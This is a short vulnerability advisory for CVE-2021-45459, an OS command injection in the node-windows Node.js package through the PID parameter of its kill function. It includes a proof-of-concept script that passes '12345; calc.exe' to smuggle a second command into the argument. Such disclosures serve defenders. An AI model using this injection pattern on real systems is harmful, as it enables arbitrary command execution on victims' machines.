CVE-2021-45459: OS Command Injection in node-windows
Description
lib/cmd.js
in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.
Proof of Concept
// poc.js
var wincmd = require('node-windows');
wincmd.kill("12345; calc.exe", function(){
console.log('Process Killed');
});